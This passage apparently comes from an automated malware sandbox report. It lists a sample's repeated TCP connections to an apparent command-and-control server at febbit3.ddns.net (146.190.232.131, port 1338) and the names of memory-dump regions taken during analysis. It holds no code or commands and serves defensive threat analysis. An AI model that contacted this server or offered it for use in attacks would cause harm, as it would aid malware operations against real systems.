NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 tcp

Files

memory/3004-0-0x00000256AAA70000-0x00000256AAA98000-memory.dmp

memory/800-1-0x0000000000400000-0x0000000000416000-memory.dmp

memory/3004-2-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp

memory/800-5-0x0000000073140000-0x000000007382E000-memory.dmp

memory/800-6-0x0000000009130000-0x00000000091C2000-memory.dmp

memory/800-7-0x00000000091D0000-0x000000000926C000-memory.dmp

memory/800-8-0x0000000009420000-0x0000000009430000-memory.dmp

memory/800-9-0x0000000009930000-0x0000000009E2E000-memory.dmp

memory/800-10-0x0000000009F30000-0x0000000009F96000-memory.dmp

memory/800-13-0x000000000A0A0000-0x000000000A0F0000-memory.dmp

memory/5028-17-0x0000000002D80000-0x0000000002D81000-memory.dmp

memory/1028-23-0x000001A6BF500000-0x000001A6BF520000-memory.dmp

memory/1028-26-0x000001A6BF680000-0x000001A6BF6A0000-memory.dmp

memory/3004-76-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp

memory/800-82-0x0000000073140000-0x000000007382E000-memory.dmp

memory/800-87-0x0000000009420000-0x0000000009430000-memory.dmp

memory/5028-104-0x00000000051A0000-0x0000000005335000-memory.dmp